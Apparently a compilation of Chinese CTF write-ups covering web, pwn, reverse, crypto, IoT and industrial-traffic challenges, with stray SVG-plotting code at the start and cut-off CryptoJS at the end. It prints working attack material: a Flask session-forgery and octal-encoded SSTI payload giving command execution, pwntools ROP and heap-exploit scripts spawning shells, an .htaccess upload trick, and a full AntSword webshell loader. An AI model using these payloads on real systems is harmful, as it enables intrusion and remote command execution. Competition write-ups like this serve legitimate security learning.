4.89412,-10.15493c0.35457,-1.38846 1.22353,-5.80282 2.44706,-8.70423c1.22353,-2.90141 1.51059,-6.02368 2.44706,-8.70423c1.32435,-3.79088 1.58691,-6.69331 4.89412,-10.15493c2.05104,-2.1468 2.44706,-2.90141 2.44706,-2.90141c0,-1.4507 1.78489,-3.90738 2.44706,-5.80282c0.46823,-1.34028 0.7553,-3.01183 1.22353,-4.35211c0.66217,-1.89544 1.22353,-4.35211 1.22353,-5.80282c0,0 1.78489,0.44473 2.44706,-1.4507c0.46823,-1.34028 0,-1.4507 1.22353,-2.90141c1.22353,-1.4507 1.22353,-2.90141 1.22353,-2.90141c1.22353,0 2.44706,1.4507 2.44706,4.35211c0,1.4507 3.04202,5.54712 3.67059,8.70423c0.56225,2.82379 0.4129,3.35113 2.44706,7.25352c0.90966,1.7452 1.45115,3.90609 3.67059,5.80282c1.40373,1.19959 2.44706,4.35211 2.44706,4.35211c1.22353,2.90141 2.65885,5.58917 3.67059,7.25352c1.59968,2.63157 2.0709,4.62195 3.67059,7.25352c2.02348,3.3287 4.89412,5.80282 6.11765,8.70423c1.22353,2.90141 3.56977,3.46264 4.89412,7.25352c0.46816,1.34028 3.32072,6.1099 6.11757,10.15493c1.09702,1.5866 3.56977,2.01194 4.89412,5.80282c0.46823,1.34028 1.22353,2.90141 2.44706,4.35211c2.44706,2.90141 2.62972,3.58943 3.67059,4.35211c2.32728,1.7054 0.8473,3.17125 2.44706,5.80282c1.01174,1.66435 3.00849,2.45667 3.67059,4.35211c0.46823,1.34027 0,1.4507 1.22353,2.90141l0,1.4507']]
# 创建图表
fig, ax = plt.subplots()
ax.set_aspect('equal')

# 存储所有点的列表
all_x_points = []
all_y_points = []

# 遍历每个SVG路径
for path_str in svg_paths:
    # 解析SVG路径
    path_string = path_str[0]   
    path = parse_path(path_string)   
    # 存储当前路径的点
    current_x_points = []
    current_y_points = []

    # 遍历路径中的每个段落
    for segment in path:
        if isinstance(segment, Line):
            # 处理直线段
            current_x_points.append(segment.start.real)
            current_y_points.append(segment.start.imag)
            current_x_points.append(segment.end.real)
            current_y_points.append(segment.end.imag)
        elif isinstance(segment, CubicBezier):
            # 处理三次贝塞尔曲线段
            current_x_points.append(segment.start.real)
            current_y_points.append(segment.start.imag)
            for t in [0.0, 0.5, 1.0]:
                point = segment.point(t)
                current_x_points.append(point.real)
                current_y_points.append(point.imag)
        elif isinstance(segment, QuadraticBezier):
            # 处理二次贝塞尔曲线段
            current_x_points.append(segment.start.real)
            current_y_points.append(segment.start.imag)
            for t in [0.0, 0.5, 1.0]:
                point = segment.point(t)
                current_x_points.append(point.real)
                current_y_points.append(point.imag)
        elif isinstance(segment, Arc):
            # 处理圆弧段
            current_x_points.append(segment.start.real)
            current_y_points.append(segment.start.imag)
            for t in [0.0, 0.5, 1.0]:
                point = segment.point(t)
                current_x_points.append(point.real)
                current_y_points.append(point.imag)

    # 将当前路径的点添加到总列表中
    all_x_points.extend(current_x_points)
    all_y_points.extend(current_y_points)

    # 在每个子路径结束时插入NaN以断开线条
    all_x_points.append(float('nan'))
    all_y_points.append(float('nan'))

# 绘制路径
ax.plot(all_x_points, all_y_points)

# 设置坐标轴范围
x_min, x_max = min(all_x_points), max(all_x_points)
y_min, y_max = min(all_y_points), max(all_y_points)
ax.set_xlim(x_min - 10, x_max + 10)
ax.set_ylim(y_min - 10, y_max + 10)

# 设置图表标题和轴标签
plt.title('SVG-title')
plt.xlabel('X-axis')
plt.ylabel('Y-axis')

# 显示网格线
plt.grid()

# 显示图表
plt.show()

image

猪圈密码,但是画反了,上下反转一下

image

但是最后一个对不上,猜了一下是g,acadesvg

image

第四届“长城杯”网络安全大赛暨京津冀网络安全技能竞赛(初赛)部分WriteUp by Mini-Venom

image

MISC

BrickGame

签到题目

image

漏洞探踪,流量解密

提取IP

cat oa.access.log|awk '{print $1}'|uniq -c|sort -nr

IP:192.168.30.234​是阶段2密码

然后看POST请求,是通达OA的洞,后面有一个/raw​,还有一个/key​,有提示

image

是RC4加密,直接解密就好了

image

最安全的加密方式

image

$pass='25ming@'​,后面有压缩包,压缩了flag.txt

image

提取出来用上面的pass解密,然后拿到一个md5的表,爆破字符即可:

UNCTF2022-公开赛 | Lazzaro (lazzzaro.github.io)

from hashlib import md5

c = '''8fa14cdd754f91cc6554c9e71929cce7
2db95e8e1a9267b7a1188556b2013b33
0cc175b9c0f1b6a831c399e269772661
b2f5ff47436671b6e533d8dc3614845d
f95b70fdc3088560732a5ac135644506
b9ece18c950afbfa6b0fdbfa4ff731d3
2510c39011c5be704182423e3a695e91
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
6f8f57715090da2632453988d9a1501b
cfcd208495d565ef66e7dff9f98764da
03c7c0ace395d80182db07ae2c30f034
e358efa489f58062f10dd7316b65649e
b14a7b8059d9c055954c92674ce60032
c81e728d9d4c2f636f067f89cc14862c
e1671797c52e15f763380b45e841ec32
4a8a08f09d37b73795649038408b5f33
4c614360da93c0a041b22e537de151eb
4b43b0aee35624cd95b910189b3dc231
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
e1671797c52e15f763380b45e841ec32
8d9c307cb7f3c4a32822a51922d1ceaa
4a8a08f09d37b73795649038408b5f33
4b43b0aee35624cd95b910189b3dc231
57cec4137b614c87cb4e24a3d003a3e0
83878c91171338902e0fe0fb97a8c47a
e358efa489f58062f10dd7316b65649e
865c0c0b4ab0e063e5caa3387c1a8741
d95679752134a2d9eb61dbd7b91c4bcc
7b8b965ad4bca0e41ab51de7b31363a1
9033e0e305f247c0c3c80d0c7848c8b3
9033e0e305f247c0c3c80d0c7848c8b3
9033e0e305f247c0c3c80d0c7848c8b3
cbb184dd8e05c9709e5dcaedaa0495cf'''.split('\n')

s = list(range(32,127))
t = {}

for k in s:
    t[md5(chr(k).encode()).hexdigest()] = chr(k)

flag=''
for k in c:
    flag += t[k]

print(flag)

WEB

SQLUP

有hint:

Hint:<!-- The developer likes to use fuzzy matching in the login module. -->

username: admin password: 1

登录,头像处上传.htaccess​和图片🐎,在/uploads/路径下,执行tac /flag即可

CandyShop

1.进去到环境后,爆破得出key是a123456

2.利用此key伪造admin身份访问admin目录

python .\flask_session_cookie_manager3.py decode -s "a123456" -c ".eJwNy8EKgCAMANB_2blDNE3tZ2JtMyQySD1E9O95ffBe4HLHtV6HZliAMUQevbcyErlp04h21iBCQSbrLKJBMuxggCSaa6pPX3vTUju1onemUzuRnCnD9wOMFB3q.Zt1QjQ.OTtQdF_Cpv1tSr2nRVze_HVtck8"

{'csrf_token': 'c39fc0885d0aa72bef356e9dda9d25753343a4c7', 'identity': 'guest', 'username': 'admin'}

3.利用链污染将全局变量sold污染为600

 python .\flask_session_cookie_manager3.py encode -s "a123456" -t "{'csrf_token': '94c60c3656b0b0e1f9875b5007a36bdb8c99a4c2', 'identity': 'admin', 'username': 'admin','__init__':{'__globals__':{'sold':600}}}"

.eJxNi0EKwyAQAP-y5x42TTTRz8iumiA1K0R7KMG_V-ilt5mBucHXa3etvKKABbN4jX7WSjMyxmk326pYIa40aw68eWNo8U94QApRWmqfcVE4k4z0rvESOuNfci5Jas6BvQcfuTDl-tNacgCrEXvvXwr9KtA.Zt1Rqw.ccWGXf3_b2qaTKmJKf1O7VZKJdg

4.然后得出flag路径

a

5.由于/admin/view_inventory目录是由render_template_string渲染有ssti漏洞

payload:

python .\flask_session_cookie_manager3.py encode -s "a123456" -t "{'csrf_token': '94c60c3656b0b0e1f9875b5007a36bdb8c99a4c2', 'identity': 'admin', 'username': 'admin','__init__':{'__globals__':
{'inventory':'{{7*7}}'}}}"

.eJxNjEEKwyAQRe8yy9KFbaLGXEYcNWVoMoKaQhHvXks33f3_4L0GvuTN1vSMDCuY2SvhJyUVChTxtplFS5RCaDcpDLh4Y9zs73AFCpEr1fewXDiIBzpLzOyO-IesJaZqLaxt7Mee0O3ld4lfo5Dyt9Cavujeoff-AQLkL0I.Zt1SVw.Y8voG3JvYxRwEznVxh_B1j2Pj4M

b

由于以上sanitize_inventory_sold函数对污染参数做了过滤,只能进行无参rce,转换为8进制进行命令执行

{{''.__class__().__bases__[0]['__subclasses__'][133]['__init__']['__globals__']['__builtins__']['eval']('__import__("os").popen("env").read()')}}

这是以上命令转换的8进制形式
{{\'\'[\'\\137\\137\\143\\154\\141\\163\\163\\137\\137\'][\'\\137\\137\\142\\141\\163\\145\\163\\137\\137\'][0][\'\\137\\137\\163\\165\\142\\143\\154\\141\\163\\163\\145\\163\\137\\137\']()[133][\'\\137\\137\\151\\156\\151\\164\\137\\137\'][\'\\137\\137\\147\\154\\157\\142\\141\\154\\163\\137\\137\'][\'\\137\\137\\142\\165\\151\\154\\164\\151\\156\\163\\137\\137\'][\'\\145\\166\\141\\154\'](\'137\\137\\151\\155\\160\\157\\162\\164\\137\\137\\050\\042\\157\\163\\042\\051\\056\\160\\157\\160\\145\\156\\050\\042\\042\\051\\056\\162\\145\\141\\144\\050\\051')}}

利用find /tmp | grep flag​命令
找到flag所在目录
tac读取flag

REVERSE

easyre

64bit,没壳,直接ida打开分析,然后F5查看伪代码,找到main​函数,

int __fastcall main(int argc, const char **argv, const char **envp)
{
  const __m128i *v3; // rcx
  unsigned __int64 v4; // r8
  __int64 i; // r10
  __int64 v6; // rax

  if ( argc <= 1 )
    exit(0);
  v3 = (const __m128i *)argv[1];
  v4 = 1LL;
  for ( i = 0LL; i != 43; ++i )
  {
    v3->m128i_i8[i] ^= v3->m128i_u8[i + 1 + -42 * (v4 / 0x2A)];
    ++v4;
  }
  if ( _mm_movemask_epi8(
         _mm_and_si128(
           _mm_cmpeq_epi8(_mm_loadu_si128(v3), (__m128i)xmmword_140021410),
           _mm_cmpeq_epi8(_mm_loadu_si128(v3 + 1), (__m128i)xmmword_140021400))) == 0xFFFF )
  {
    v6 = sub_1400011A0(&qword_1400312E0, "flag is your input", v4, 0xC30C30C30C30C30DuLL);
    sub_1400015A0(v6);
  }
  return 0;
}

逻辑很清晰,就是一个异或,然后比对,去内存找到加密后的数据,

image

然后写脚本解密

#include <iostream>
#include <vector>

int main() {
    std::vector<unsigned char> encoded = { 0x0A, 0x0D, 0x06, 0x1C, 0x1D, 0x05, 0x05, 0x5F, 0x0D, 0x03,
                                           0x04, 0x0A, 0x14, 0x49, 0x05, 0x57, 0x00, 0x1B, 0x19, 0x02,
                                           0x01, 0x54, 0x4E, 0x4C, 0x56, 0x00, 0x51, 0x4B, 0x4F, 0x57,
                                           0x05, 0x54, 0x55, 0x03, 0x53, 0x57, 0x01, 0x03, 0x07, 0x04,
                                           0x4A, 0x77, 0x0D };
    std::vector<int> xorIndices;

    int stepCounter = 1;
    for (int i = 0; i < encoded.size(); i++) {
        int index = i + 1 - 42 * (stepCounter / 42);
        xorIndices.push_back(index);
        stepCounter++;
    }

    int currentIndex = encoded.size() - 1;
    for (int i = encoded.size() - 1; i >= 0; i--) {
        encoded[i] ^= encoded[xorIndices[currentIndex]];
        currentIndex--;
    }

    for (auto byte : encoded) {
        std::cout << byte;
    }
    std::cout << std::endl;

    return 0;
}
//flag{fcf94739-da66-467c-a77f-b50d12a67437}

CRYPTO

RandomRSA

普遍意义上来说,nextprime不会超出枚举范围,两层组合,复杂度上来看也依然可以尝试,

n的结构很简单的二元式子,flag也证明了只需爆破,一些格的做法这里似乎找不到合适的放缩,维度也较低,故而放弃

from Crypto.Util.number import *
from sympy.ntheory.residue_ntheory import nthroot_mod

p = 170302223332374952785269454020752010235000449292324018706323228421794605831609342383813680059406887437726391567716617403068082252456126724116360291722050578106527815908837796377811535800753042840119867579793401648981916062128752925574017615120362457848369672169913701701169754804744410516724429370808383640129
a = 95647398016998994323232737206171888899957187357027939982909965407086383339418183844601496450055752805846840966207033179756334909869395071918100649183599056695688702272113280126999439574017728476367307673524762493771576155949866442317616306832252931038932232342396406623324967479959770751756551238647385191314
b = 122891504335833588148026640678812283515533067572514249355105863367413556242876686249628488512479399795117688641973272470884323873621143234628351006002398994272892177228185516130875243250912554684234982558913267007466946601210297176541861279902930860851219732696973412096603548467720104727887907369470758901838
n = 5593134172275186875590245131682192688778392004699750710462210806902340747682378400226605648011816039948262008066066650657006955703136928662067931212033472838067050429624395919771757949640517085036958623280188133965150285410609475158882527926240531113060812228408346482328419754802280082212250908375099979058307437751229421708615341486221424596128137575042934928922615832987202762651904056934292682021963290271144473446994958975487980146329697970484311863524622696562094720833240915154181032649358743041246023013296745195478603299127094103448698060367648192905729866897074234681844252549934531893172709301411995941527
c = 2185680728108057860427602387168654320024588536620246138642042133525937248576850574716324994222027251548743663286125769988360677327713281974075574656905916643746842819251899233266706138267250441832133068661277187507427787343897863339824140927640373352305007520681800240743854093190786046280731148485148774188448658663250731076739737801267702682463265663725900621375689684459894544169879873344003810307496162858318574830487480360419897453892053456993436452783099460908947258094434884954726862549670168954554640433833484822078996925040310316609425805351183165668893199137911145057639657709936762866208635582348932189646
e = 65537

for k1 in range(1000):
    for k2 in range(1000):
        A = a
        B = b + k2 + k1 * a
        C = k1 * (b + k2) - n
        # Ax^2 + Bx + C - n = 0
        # 求根公式
        delta = nthroot_mod(B**2 - 4 * A * C,2,p)
        p1 = (-B + delta) * inverse(2 * A, p) % p + k1
        p2 = (-B - delta) * inverse(2 * A, p) % p + k1
        if n % p1 == 0:
            p = p1
            q = n // p
            d = inverse(e, (p - 1) * (q - 1))
            print(long_to_bytes(pow(c, d, n)))
        elif n % p2 == 0:
            p = p2
            q = n // p
            d = inverse(e, (p - 1) * (q - 1))
            print(long_to_bytes(pow(c, d, n)))


大约3h

b'flag{j1st_e_s1mp1e_b3ute}' ‍

PWN

FlowerShop

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process('./pwn')
elf=ELF('./pwn')
bin_sh=0x601840
pay=b'\x00'*52+b'pwn\x00'+b'\xff\xff\xff\xff'
p.send(pay)
p.sendline(b'a')
p.sendline(b'c')
p.sendline(str(1))
p.sendline(b'a')
p.sendline(str(1))
p.sendline(b'a')
p.sendline(str(1))
p.sendline(b'b')
rdi=0x0000000000400f13
payload=b'a'*0x18+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(0x400730)

p.send(payload)
p.sendline(str(1))

p.interactive()

Kylin_Heap

image

漏洞点位于free这个地方,由于没有清空指针造成的uaf,通过这个即可泄露地址和进行任意地址写,由于libc版本为2.31,所以劫持free_hook

from pwn import *
import json
from struct import pack
from ctypes import *
import base64
#from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------

context(os='linux', arch='amd64', log_level='debug')
p=remote("IP",PORT)
elf = ELF('./Heap')
libc = ELF('./libc-2.31-0kylin9.2k0.2.so')

def add(size,content):
        sla(b'What will you do, adventurer? ',b'1')
        sla(b'Enter the size of the block you wish to summon (1 to 1280 bytes): ',str(size))
        sla(b'bytes):\n',content)

def free(idx):
        sla(b'What will you do, adventurer? ',b'2')
        sla(b'index (0-19): ',str(idx))

def edit(idx,content):
        sla(b'What will you do, adventurer? ',b'3')
        sla(b'index (0-19): ',str(idx))
        sla(b'bytes):\n',content)

def show(idx):
        sla(b'What will you do, adventurer? ',b'4')    
        sla(b'index (0-19): ',str(idx))

add(0x460,b'a'*0x10)
add(0x20,b'a'*8)
free(0)
show(0)
p.recvline()
libc_base=u64(p.recv(6).ljust(8,b'\x00'))

free_hook=libc_base+0x2f48
malloc_hook=libc_base-0x70

for i in range(9):
        add(0x68,b'a'*1)
for i in range(9):
        free(i+1)
system=libc_base-0x1967d0
edit(9,p64(free_hook-0x10))
for i in range(7):
        add(0x68,b'a'*8)
add(0x68,b'/bin/sh\x00'*1)
add(0x68,b'/bin/sh\x00'*1)
edit(19,p64(system))
print(hex(libc_base))
free(18)
p.interactive()

2024中国工业互联网安全大赛智能家电行业赛道WriteUp by 图书馆五楼风很大

  1. 我要做k1✌和🍁✌的犬
  2. 第一次线下赛里AK CTF,被带飞了

IOT

BLE协议分析

image

有多的数据在流量包上,winhex查看:image

提取出来压缩包:image

压缩包被Link key加密了,找到key之后直接解密即可

image

固件恶意修改

直接binwalk,逆向libc.so,看到flag字符串拉出来异或0x13即可:

image

ICS

异常工控流量

image

发现有图片,筛选一下对话

image

发现每个会话中传输数据时会有26个字符的冗余数据,我们剔除一下

def remove_first_26_characters_from_file(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as infile, open(output_file, 'w', encoding='utf-8') as outfile:
        for line in infile:
            if len(line) > 26:
                outfile.write(line[26:])
            else:
                outfile.write("\n")

input_file = '1.txt'
output_file = '2.txt'
remove_first_26_characters_from_file(input_file, output_file)

删除换行后保存,但其实这个里面有5张图片,

image所以我们还要foremost处理一下:

image

UDP协议分析

image

image

IEC104规约

看到ASCII码,直接手撕即可:

image

Crypto

RSA基础

共模攻击,exp:

c1 =282705666501444854624030335843070278110513999208659624119132353417421877320974174726185723115883739375603575539776684289142842081107540752217713310938886388438765148683666503760319981604000841079147612861242547174901151960326185178594145796272575965121308396667074309893237298402981092205251435016486788355557005100976024481986488241332897816063646036029173817781914329777829
c2 =19779823413362200485724149034181018999410626485138088903284373558580616789569485657574219218963582906498915197615166461344813005314601583353879854456996384771611224182224314328699916590207979217040630122659016196173896894143014133285344419385684770427047708769088078011203493463005336960259880317647033975742421041071189257432803790499356057590994991391605641521779836861778658020794054290457012449182530332757413136817938054644562477837440962036207078499430458903340248503943892760759128605500003626883373592832713373873793856007995860587980373325336088814954403731749322597283094105727377495665913500828541311250125
n = 24866250804505220218021129477484568516463472283723642072878571290335870619105804830823116205886290964965394872910452503069396984759129562070393515671275407311508237739944634226857150890458268632605358633616031418076608519871923398298948052896198945015398352362000371666214905121198052253192761994934148606149933191728295444634540686915579254197309033452299738379299252926144007809221771616214106556442176944539578493279760907351585075298726128493600470601333121139581042597139052755429088012111156725917525172320925107023532695431754652983139199688263292810675849198042528240794130276172752316953055879930331587217697
e1 = 3
e2 = 17
g,r,s = gmpy2.gcdext(e1, e2)
m = pow(c1, r , n) * pow(c2, s, n) % n
m = iroot(m,g)[0]
print(long_to_bytes(m))

MISC

恶意流量分析

先分析第一个shell:

<?php
header("HTTP/1.1 404 Not Found");
foreach($_POST as $k => $v){$_POST[$k]=@pack("H*", $v);}
ob_start();
@eval($_POST['ant']);
$output = ob_get_clean();
echo base64_encode($output);
?>

传参ant

image

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.6490fca760";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "486"."62e2";echo @asenc($output);echo "8810"."3adb5";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}   ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="   {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

和蚁剑差不多,返回包删掉前后添加的多余字符解密一下

image

image

下一个流有新的shell

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.b5458";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "1518c"."d5b0d";echo @asenc($output);echo "1c61"."78f7";}ob_start();try{$p=base64_decode(substr($_POST["protocol"],10));$s=base64_decode(substr($_POST["source"],10));$envstr=@base64_decode(substr($_POST["declaring"],10));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("a@127.0.0.1", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("
",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

也有了新的参数procotl source​等,然后追一下逐个解密,发现把flag通过这些参数写到了flag.txt中,找到有flag.txt所在的流量包,剔除前面多余字符解密即可

image

image

image

image

flag{D4572AA3A3D97DDEABD52DF47DA3AD0F}

WEB

应用逻辑异常

!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,e){return new u.HMAC.init(r,e).finalize(t)}}}),t.algo={});return t}(Math);function K(t,e,r){return t&e|~t&r}function X(t,e,r){return t&r|e&~r}function L(t,e){return t<<e|t>>>32-e}function j(t,e,r,i){var n,o=this._iv;o?(n=o.slice(0),this._iv=void 0):n=this._prevBlock,i.encryptBlock(n,0);for(var s=0;s<r;s++)t[e+s]^=n[s]}function T(t){var e,r,i;return 255==(t>>24&255)?(r=t>>8&255,i=255&t,255===(e=t>>16&255)?(e=0,255===r?(r=0,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i):t+=1<<24,t}function N(){for(var 